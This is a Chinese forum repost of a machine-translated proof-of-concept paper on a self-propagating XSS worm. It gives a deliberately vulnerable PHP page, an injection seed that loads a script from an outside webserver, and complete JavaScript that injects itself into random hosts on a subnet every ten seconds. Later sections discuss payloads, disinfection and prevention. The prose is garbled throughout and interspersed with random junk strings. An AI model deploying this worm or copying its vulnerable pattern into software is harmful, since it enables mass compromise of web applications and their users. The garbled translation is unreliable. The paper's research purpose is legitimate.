跨站(xss)脚本病毒编写详解 (HaCkXi译文)2009-02-23 08:55下面的概念证明表明了XSS病毒。脆弱的环境造成就是一个例子情景的XSS所需的病毒,并不表明详尽的一套可能的条件。这说明在长期的XSS一个web应用。在这种情况下,漏洞是通过利用获得的请求,这使得小病毒将创建。
$ M$ L+ s2 S6 X- H4 r9 `7 n# i1 z6 B J( e# I8 `2 V7 \/ A
最初的一个实例脆弱的web应用将种子与自我传播的代码。当此代码是由网页浏览器,它的结果在他们的感染。被感染的网页浏览器连接到随机地点和执行利用获得的要求。注入代码,从而进一步易受感染的Web应用与自我繁殖的代码。) P+ V* C) p3 y- y, Y
1 m" O4 R- |# _; y1 k7 Y9 W下面制作的永久性的XSS利用PHP页面可以感染病毒。该网页接受一个参数(参数)值,并写入到一个文件( file.txt ) 。这个档案,然后返回请求的浏览器。该文件将包含以前的值的“参数”参数。如果没有参数是通过它会显示该文件没有更新。7 G# t. [5 i/ z; c' ~% L* e
$ h! x5 H2 g4 |# v; B' H% J% ]
Web应用程序:index.php
2 Z& V% Q' Q x2 h7 o/ I5 z
5 n0 F5 p+ @. [; \ l; y* kQUOTE:<?php ! p: ^1 f. e M+ x7 N
$p=$HTTP_GET_VARS['param']; ( g# [5 U& h1 Z$ x0 P* o5 _+ a8 u
$filename = "./file.txt"; $ T$ C& n$ G6 @4 H2 {( _9 _
# r9 E4 C! z3 M7 D3 ?7 k
if ($p != "") { ) Z- y; h" {6 F
$handle=fopen($filename, "wb"); 0 u. K4 L3 Y6 H* n
fputs($handle, $p);
" K; S; P7 d. R9 d2 z) H3 [0 [# jfclose($handle);
5 }: a4 O2 X2 V( P' G } " |" ]2 i5 }+ a* ]
, q( Q) q$ u) I0 a $handle = fopen($filename, "r"); " ^6 @- [6 D) w& A
$contents = fread($handle, filesize($filename)); 5 [+ z% k! ^) c S6 y" H
fclose($handle);
! q+ R1 o2 x3 ? C
" W5 Z @( V3 }' M print $contents;
. ?, m# Z/ l% t" l3 b0 v7 F% z?>
/ S) L( [0 |. z& d/ b0 K
, i% C3 @$ C% B此网页的index.php 主办的多个虚拟服务器在10.0.0.0/24子网。一个网络应用实例种子,然后用以下代码检索javascript文件并执行它。另外,有可能注入到整个代码的脆弱的应用,而不是要求javascript文件。为了简洁明了, JavaScript文件(xssv.jsp)要求。$ ^0 F, f ^! E' {/ o! V/ F
- ]5 O7 G- X2 r: y% E' Y6 V$ p$ \注入种子编号:
, M( k* i0 e. q& f6 `% `$ m ?
! X6 T$ v2 e: e: Q% G5 LQUOTE:<iframe name="iframex" id="iframex" src="hidden" style="display:none"> & [- r! ?6 g. t# I! o/ r
</iframe>
2 ~$ R6 M& @% A9 S! R Y<script SRC="http://<webserver>/xssv.js"></script>
5 x+ S3 I X$ L8 ?0 N% R3 K/ r5 A3 G& [" q2 A5 k
在javascript文件所要求的例子如下所示。其自我用途繁殖的iframe是定期重新使用loadIframe ()函数。目标网站的IP地址的iframe是随机挑选的10.0.0.0/24子网的功能通过get_random_ip()。该病毒使用的XSS相结合的这两项职能,并不断定期调用使用setInterval()函数。
" D/ o5 i" @) o* S( s) a- z8 E- ?& a: G
Javascipt : xssv.jsp
! U/ i7 }2 K' O6 W8 q: U- R6 P4 @8 S2 m# u4 I9 B
QUOTE:function loadIframe(iframeName, url) {
& o+ p* y; l. L Q6 o) k if ( window.frames[iframeName] ) { . \: p# K( S6 K& \7 x4 q
window.frames[iframeName].location = url; 0 s5 R! v8 [, ~1 l1 U: A X# `
return false; 9 v9 _! V. J4 u5 T
}
$ }/ `& m# Q% J9 u$ E( P8 C! R/ R else return true; X6 c- r. h3 \# p: G! \
}
: n# S; ]- g0 [( [, s, M) s( w
4 B" V/ m9 V& r5 r( Mfunction do_request() { 5 t- R- e" N7 P7 g
var ip = get_random_ip();
' x' k' [9 C; c& o" {- K, m var exploit_string = '<iframe name="iframe2" id="iframe2" ' +
+ T$ G& [2 ^* L1 A8 @. n'src="hidden" style="display:none"></iframe> ' + 1 N0 B5 F4 U7 T/ I) J0 _
'<script SRC="http://<webserver>/xssv.js"></script>'; 2 Y$ C: @" x6 u% M! M- I' c5 ~" T
, T2 t. ^ X. p9 Q: ` loadIframe('iframe2',
/ x7 x4 c H: ~& D* m' w"http://" + ip + "/index.php?param=" + exploit_string);
# N) O0 q7 k: A9 Y: V7 z( V" P} 8 b% w2 F8 l. Y2 Q0 b6 @# T% A. W+ m1 E
, w+ ?) F# _. ufunction get_random()
& m3 K4 Q7 {; F' [6 j/ V{
- N, T+ p5 [/ A+ I0 {1 z var ranNum= Math.round(Math.random()*255);
+ Y$ _6 e7 M- ]2 x1 c- C return ranNum; 7 i) m6 }2 X, m* `% o
} 8 R$ I2 ~1 O( N. I/ N5 {
6 Z$ O# P+ ~* ~" i2 Zfunction get_random_ip() 1 x0 G) V* W: Z H8 {0 E0 A
{
% _9 M/ R) N$ F" C: Z9 W return "10.0.0."+get_random();
' D' s, S0 D8 E( y) ?7 l; m- C} 6 S; T) Y; r; }) }1 Z( E C
- p0 g5 d& _. b0 f& h! ~setInterval("do_request()", 10000);
0 F3 n V$ j, h5 p" a/ `, A# |8 o5 g2 K& O
看种子Web应用的浏览器造成感染其他网络应用的10.0.0.0/24子网。这种感染,一直持续到一些,但并非所有的应用受到感染。在这一点上的浏览器是手动停止。另一个浏览器,然后用来查看一个新感染的Web应用。该病毒然后继续感染,其余未web应用程序的子网内。2 o! Z% K4 T+ P$ T
) Y1 r, i" _6 f6 Z
这个概念证明表明,控制的条件下,没有什么不同,以一个真实的世界环境中,跨站脚本病毒可以自我繁殖和传染。
; x) d. d# D/ C0 l9 B% @5 b/ Y0 ^. s1 I4 D6 e- ?# x; L
常规病毒分歧
( J9 m7 l. e, p2 J' T" j: w4 G7 S) b/ p) l' \% Y; H2 }5 O6 w
常规病毒和执行居住在同一系统上。单独的XSS病毒的这两个要求的一种共生关系,服务器和浏览器。执行发生在客户端浏览器的代码,并驻留在服务器上。
& W$ ?: y3 F& K7 v8 W; A
' s$ e; o( H5 s W! B纲要indiscrimination还分成一的XSS病毒从传统的对应。这是因为封装在HTML和HTTP / HTTPS协议。这些标准是支持大部分网络浏览器上运行不同的操作系统,使得跨站点脚本病毒平台独立。这个平台的独立性增加了一些潜在的网络应用,可感染。
5 w8 r$ l$ [' G6 A& N感染
3 [. h" b6 `3 l# f; K4 W
0 [0 V" l, P# _4 T$ m跨站点脚本病毒感染发生在两个阶段,通常至少有两个设备。因此,有两种感染工作共生。
" r, e" Y, m4 W: _: E- ]% W7 w% _( Q5 i, ]8 B+ k3 g
服务器感染了持续自我传播的代码,它没有执行。第二阶段是浏览器的感染。注入代码加载从网站到非持久性的网络浏览器和处决。执行然后寻求新的服务器/网页加以利用并有可能执行它的有效载荷。通常情况下,将有一个受感染的服务器,许多受感染的浏览器。 / z) |( a) l0 m% p6 g/ L
有效载荷* H& i, ]/ {0 Q
/ ~: \. D, g8 k0 d7 i5 J* X+ U
常规病毒一样,病毒的XSS能够提供有效载荷。该有效载荷将被处死的浏览器,并有限制的HTML兼容的代码。也就是说,有效载荷可以执行的HTML功能,包括了JavaScript 。
' }) q! J0 _, a$ `) c5 ^6 t9 V/ ~1 t0 m, j1 ]3 Z
虽然这并不构成限制,跨站脚本病毒仍然能够恶意活动。例如,可以有效载荷提供DDOS攻击,显示垃圾邮件或包含浏览器的漏洞。未来的载荷能力很可能是更大的原因越来越多的浏览器老练。 % r* o2 k' Z* X/ C% u5 J6 z2 n. `
消毒8 `0 `" Q$ X% d8 _3 _2 n, D1 t
* l6 Z, `2 K, D# a+ S3 t之间的关系,服务器和一个浏览器可以被打破,只需关闭浏览器。但是,目前还没有手段来防止浏览器再次感染以外的其他禁用浏览器的功能。
' M! [* O" a! ]8 D- P5 b1 x! h
0 [2 ^6 d6 e# G潜在的消毒方法将涉及引荐外地的请求标头。这是由于这一事实,即引荐很可能是登录网络服务器那里感染了尝试。因此,如果引荐欺骗并没有发生后,日志文件将揭示线索回到来源的病毒。8 Q* r/ |& V% t1 I8 j
+ E) ?/ e5 Z& m预防9 J. S3 L. P4 V
?- E! p; L' Y一个共同的初期,以预防病毒感染是一个网络级防火墙。正如的HTTP / HTTPS协议是提供不受限制地通过共同的防火墙配置,这些防火墙障碍是无效的。一个潜在的补救措施,这是一个应用防火墙适当的XSS病毒签名。虽然不太可能,最明显的方式,以防止病毒的XSS是消除了XSS漏洞的Web应用。
. h" r U" U% a% Q# H- v$ P1 s$ Y& J5 a# s" E
结论7 v* w0 F. H' @. D- X" v4 ~# Q
1 [+ C; ]) ]8 J# N3 R
传染病性质的XSS病毒已被证明在一个受控环境。它是通过故意制作脆弱的网络应用程序分布在子网。这个环境,后来受到感染。) v* j |1 o+ q) m( O# v
- f' j+ x- c9 X; a- v
的XSS病毒是一种新的物种。他们区分自己从他们的表兄弟通过常规的要求一台服务器的客户共生的关系和它们的平台独立性。这些差异产生积极和消极影响,毒的感染。1 b$ z% V3 A2 G/ J; X, J0 _
% F! D1 Y9 ]) U! I1 E
本文说明了XSS病毒是平台独立的,并能进行恶意的职能。虽然有减缓的因素,这些问题再加上日益复杂的网络浏览器显示的XSS威胁的病毒。主动必须采取措施,以打击这一威胁,病毒之前的XSS成为流行病。
. ~6 {8 v/ a& V3 ?! p4 Y
& M, ?0 M3 Z! r, b) F2 O0 u 翻译者: HaCkXi 2 s( k8 l+ z! B; j# n, t# `
Blog: www.hackxi.cn' v" l. z1 w; R7 E
提供者:ShadowHider; d; k1 T9 A* _: T$ A/ B6 u$ i8 F
Blog: http://hi.baidu.com/zrxc
: f0 H1 |" S4 X( K4 w; w ( ]2 o5 D) O, `: t: }
|